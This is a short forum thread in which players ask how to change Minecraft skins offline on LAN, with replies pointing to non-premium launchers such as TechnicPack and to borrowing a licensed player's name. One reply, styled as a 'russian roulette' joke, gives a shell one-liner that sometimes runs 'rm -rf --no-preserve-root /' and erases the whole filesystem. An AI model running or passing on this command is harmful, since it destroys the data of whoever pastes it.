We often made changes to "steve.png" and "alex.png" texture but my deep concern is that did someone knows how to change it offline without touching these files in playing LAN?

You actually said it (?) When I used to be non premium I changed the steve skin and that was it. That was a long ago tho.
Play russian rulette:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*

You and your friends can use some launchers like TechnicPack (NO-PREMIUM) where you can change yourself skin by clicking on one button. That's the only way, or buying premium minecraft Tongue

You can just print nickname of someone license user and get the skin. For example: Notch. You will be get a skin and a thing on spine
